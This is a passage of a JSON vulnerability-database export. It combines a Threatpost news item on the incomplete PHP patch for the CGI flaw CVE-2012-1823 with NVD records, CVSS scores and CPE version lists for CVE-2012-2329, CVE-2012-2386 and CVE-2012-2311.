warned that the fixes didn\u2019t completely address the issue and still left sites vulnerable. The researchers, known as Eindbazen, discovered the vulnerability during a capture the flag competition earlier this year and were working with PHP developers and US-CERT on a fix. But the bug was disclosed accidentally when the PHP internal tracking system mistakenly marked the bug as public before a patch was ready.\n\nThe PHP Group on Friday released two new versions of the language, but Eindbazen said that they did not completely fix the problem.\n\n\u201cThe new PHP release is buggy. You can use their mitigation mod_rewrite rule, but the patch and new released versions do not fix the problem. At the bottom we have added a version of the PHP patch that fixes the obvious problem with the patch merged in the recently released security update,\u201d the team said. \n\nNow, the PHP developers are planning to push out another new release on Tuesday to hopefully fix the flaw.\n\n\u201cPHP 5.3.12/5.4.2 do not fix all variations of the CGI issues described in CVE-2012-1823. It has also come to our attention that some sites use an insecure cgiwrapper script to run PHP. These scripts will use **$*** instead of **\u201c$@\u201d** to pass parameters to php-cgi which causes a number of issues. Again, people using mod_php or php-fpm are not affected,\u201d The PHP Group said.\n\n\u201cAnother set of releases are planned for Tuesday, May, 8th. These releases will fix the CGI flaw and another CGI-related issue in apache_request_header (5.4 only).\u201d\n\n \n\n", "modified": "2013-04-17T16:32:17", "published": "2012-05-08T14:46:23", "id": "THREATPOST:4E1049C3C10581837DF71F684CB00683", "href": "https://threatpost.com/php-group-set-release-another-patch-cve-2012-1823-flaw-050812/76537/", "type": "threatpost", "title": "PHP Group Set to Release Another Patch for CVE-2012-1823 Flaw", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2020-10-03T12:06:04", "description": "Buffer overflow in the apache_request_headers function in sapi/cgi/cgi_main.c in PHP 5.4.x before 5.4.3 allows remote attackers to cause a denial of service (application crash) via a long string in the header of an HTTP request.", "edition": 3, "cvss3": {}, "published": "2012-05-11T10:15:00", "title": "CVE-2012-2329", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2329"], "modified": "2017-08-29T01:31:00", "cpe": ["cpe:/a:php:php:5.4.1", "cpe:/a:php:php:5.4.0", "cpe:/a:php:php:5.4.2"], "id": "CVE-2012-2329", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2329", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:php:php:5.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:47:19", "description": "Integer overflow in the phar_parse_tarfile function in tar.c in the phar extension in PHP before 5.3.14 and 5.4.x before 5.4.4 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted tar file that triggers a heap-based buffer overflow.", "edition": 5, "cvss3": {}, "published": "2012-07-07T10:21:00", "title": "CVE-2012-2386", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2386"], "modified": "2012-09-22T03:32:00", "cpe": ["cpe:/a:php:php:4.4.0", "cpe:/a:php:php:4.4.6", "cpe:/a:php:php:5.1.5", "cpe:/a:php:php:4.0.4", "cpe:/a:php:php:5.2.1", "cpe:/a:php:php:5.2.12", "cpe:/a:php:php:5.4.1", "cpe:/a:php:php:3.0.11", "cpe:/a:php:php:3.0.17", "cpe:/a:php:php:5.0.1", "cpe:/a:php:php:5.2.11", "cpe:/a:php:php:5.3.4", "cpe:/a:php:php:5.2.9", "cpe:/a:php:php:5.2.6", "cpe:/a:php:php:4.4.2", "cpe:/a:php:php:5.1.4", "cpe:/a:php:php:3.0.12", "cpe:/a:php:php:4.4.8", "cpe:/a:php:php:4.4.9", "cpe:/a:php:php:4.0", "cpe:/a:php:php:3.0.15", "cpe:/a:php:php:5.3.8", "cpe:/a:php:php:4.3.6", "cpe:/a:php:php:4.4.3", "cpe:/a:php:php:4.3.0", "cpe:/a:php:php:4.0.2", "cpe:/a:php:php:4.0.7", "cpe:/a:php:php:4.3.7", "cpe:/a:php:php:5.1.3", "cpe:/a:php:php:5.3.9", "cpe:/a:php:php:3.0.16", "cpe:/a:php:php:4.3.4", "cpe:/a:php:php:5.4.0", "cpe:/a:php:php:5.1.6", "cpe:/a:php:php:5.2.3", "cpe:/a:php:php:5.2.5", "cpe:/a:php:php:3.0.9", "cpe:/a:php:php:3.0.4", "cpe:/a:php:php:4.3.5", "cpe:/a:php:php:5.3.6", "cpe:/a:php:php:3.0.8", "cpe:/a:php:php:4.2.0", "cpe:/a:php:php:3.0.2", "cpe:/a:php:php:3.0", "cpe:/a:php:php:5.3.10", "cpe:/a:php:php:5.0.2", "cpe:/a:php:php:3.0.1", "cpe:/a:php:php:2.0", "cpe:/a:php:php:4.3.2", "cpe:/a:php:php:5.3.5", "cpe:/a:php:php:3.0.14", "cpe:/a:php:php:5.3.1", "cpe:/a:php:php:5.2.10", "cpe:/a:php:php:4.4.7", "cpe:/a:php:php:4.3.1", "cpe:/a:php:php:5.2.4", "cpe:/a:php:php:5.1.0", "cpe:/a:php:php:5.2.0", "cpe:/a:php:php:5.3.0", "cpe:/a:php:php:4.3.10", "cpe:/a:php:php:4.2.1", "cpe:/a:php:php:5.2.15", "cpe:/a:php:php:5.0.4", "cpe:/a:php:php:3.0.7", "cpe:/a:php:php:4.0.0", "cpe:/a:php:php:4.3.11", "cpe:/a:php:php:4.1.2", "cpe:/a:php:php:5.2.8", "cpe:/a:php:php:5.3.11", "cpe:/a:php:php:3.0.3", "cpe:/a:php:php:4.4.1", "cpe:/a:php:php:4.1.0", "cpe:/a:php:php:4.0.5", "cpe:/a:php:php:4.3.8", "cpe:/a:php:php:5.2.13", "cpe:/a:php:php:5.1.1", "cpe:/a:php:php:4.4.4", "cpe:/a:php:php:4.3.3", "cpe:/a:php:php:5.2.2", "cpe:/a:php:php:5.3.12", "cpe:/a:php:php:5.3.7", "cpe:/a:php:php:3.0.10", "cpe:/a:php:php:4.3.9", "cpe:/a:php:php:4.0.3", "cpe:/a:php:php:5.2.17", "cpe:/a:php:php:5.0.5", "cpe:/a:php:php:4.2.2", "cpe:/a:php:php:3.0.13", "cpe:/a:php:php:3.0.5", "cpe:/a:php:php:5.3.2", "cpe:/a:php:php:4.0.1", "cpe:/a:php:php:5.0.3", "cpe:/a:php:php:4.4.5", "cpe:/a:php:php:5.2.7", "cpe:/a:php:php:3.0.6", "cpe:/a:php:php:2.0b10", "cpe:/a:php:php:5.1.2", "cpe:/a:php:php:4.2.3", "cpe:/a:php:php:1.0", "cpe:/a:php:php:5.3.3", "cpe:/a:php:php:4.1.1", "cpe:/a:php:php:5.0.0", "cpe:/a:php:php:5.2.14", "cpe:/a:php:php:3.0.18", "cpe:/a:php:php:4.0.6", "cpe:/a:php:php:5.2.16"], "id": "CVE-2012-2386", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2386", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:php:php:5.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:2.0b10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta_4_patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.9:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:47:19", "description": "sapi/cgi/cgi_main.c in PHP before 5.3.13 and 5.4.x before 5.4.3, when configured as a CGI script (aka php-cgi), does not properly handle query strings that contain a %3D sequence but no = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-1823.", "edition": 5, "cvss3": {}, "published": "2012-05-11T10:15:00", "title": "CVE-2012-2311", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2311"], "modified": "2018-01-18T02:29:00", "cpe": ["cpe:/a:php:php:4.4.0", "cpe:/a:php:php:4.4.6", "cpe:/a:php:php:5.1.5", "cpe:/a:php:php:4.0.4", "cpe:/a:php:php:5.2.1", "cpe:/a:php:php:5.2.12", "cpe:/a:php:php:5.4.1", "cpe:/a:php:php:3.0.11", "cpe:/a:php:php:3.0.17", "cpe:/a:php:php:5.0.1", "cpe:/a:php:php:5.2.11", "cpe:/a:php:php:5.3.4", "cpe:/a:php:php:5.2.9", "cpe:/a:php:php:5.2.6", "cpe:/a:php:php:4.4.2", "cpe:/a:php:php:5.1.4", "cpe:/a:php:php:3.0.12", "cpe:/a:php:php:4.4.8", "cpe:/a:php:php:4.4.9", "cpe:/a:php:php:4.0", "cpe:/a:php:php:3.0.15", "cpe:/a:php:php:5.3.8", "cpe:/a:php:php:4.3.6", "cpe:/a:php:php:4.4.3", "cpe:/a:php:php:4.3.0", "cpe:/a:php:php:4.0.2", "cpe:/a:php:php:4.0.7", "cpe:/a:php:php:4.3.7", "cpe:/a:php:php:5.1.3", "cpe:/a:php:php:5.3.9", "cpe:/a:php:php:3.0.16", "cpe:/a:php:php:4.3.4", "cpe:/a:php:php:5.4.0", "cpe:/a:php:php:5.1.6", "cpe:/a:php:php:5.2.3", "cpe:/a:php:php:5.2.5", "cpe:/a:php:php:3.0.9", "cpe:/a:php:php:3.0.4", "cpe:/a:php:php:4.3.5", "cpe:/a:php:php:5.3.6", "cpe:/a:php:php:3.0.8", "cpe:/a:php:php:4.2.0", "cpe:/a:php:php:3.0.2", "cpe:/a:php:php:3.0", "cpe:/a:php:php:5.3.10", "cpe:/a:php:php:5.0.2", "cpe:/a:php:php:3.0.1", "cpe:/a:php:php:2.0", "cpe:/a:php:php:4.3.2", "cpe:/a:php:php:5.3.5", "cpe:/a:php:php:3.0.14", "cpe:/a:php:php:5.3.1", "cpe:/a:php:php:5.2.10", "cpe:/a:php:php:4.4.7", "cpe:/a:php:php:4.3.1", "cpe:/a:php:php:5.2.4", "cpe:/a:php:php:5.1.0", "cpe:/a:php:php:5.2.0", "cpe:/a:php:php:5.3.0", "cpe:/a:php:php:4.3.10", "cpe:/a:php:php:4.2.1", "cpe:/a:php:php:5.2.15", "cpe:/a:php:php:5.0.4", "cpe:/a:php:php:3.0.7", "cpe:/a:php:php:4.0.0", "cpe:/a:php:php:4.3.11", "cpe:/a:php:php:4.1.2", "cpe:/a:php:php:5.2.8", "cpe:/a:php:php:5.3.11", "cpe:/a:php:php:3.0.3", "cpe:/a:php:php:4.4.1", "cpe:/a:php:php:4.1.0", "cpe:/a:php:php:4.0.5", "cpe:/a:php:php:4.3.8", "cpe:/a:php:php:5.2.13", "cpe:/a:php:php:5.1.1", "cpe:/a:php:php:4.4.4", "cpe:/a:php:php:4.3.3", "cpe:/a:php:php:5.2.2", "cpe:/a:php:php:5.3.12", "cpe:/a:php:php:5.3.7", "cpe:/a:php:php:3.0.10", "cpe:/a:php:php:4.3.9", "cpe:/a:php:php:4.0.3", "cpe:/a:php:php:5.2.17", "cpe:/a:php:php:5.0.5", "cpe:/a:php:php:4.2.2", "cpe:/a:php:php:3.0.13", "cpe:/a:php:php:3.0.5", "cpe:/a:php:php:5.3.2", "cpe:/a:php:php:4.0.1", "cpe:/a:php:php:5.0.3", "cpe:/a:php:php:4.4.5", "cpe:/a:php:php:5.2.7", "cpe:/a:php:php:3.0.6", "cpe:/a:php:php:2.0b10", "cpe:/a:php:php:5.1.2", "cpe:/a:php:php:4.2.3", "cpe:/a:php:php:1.0", "cpe:/a:php:php:5.3.3", "cpe:/a:php:php:4.1.1", "cpe:/a:php:php:5.0.0", "cpe:/a:php:php:5.2.14", "cpe:/a:php:php:3.0.18", "cpe:/a:php:php:4.0.6", "cpe:/a:php:php:5.2.16"], "id": "CVE-2012-2311", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2311", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:php:php:5.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:2.0b10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta_4_patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.9:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:47:19", "description": "The crypt_des (aka DES-based 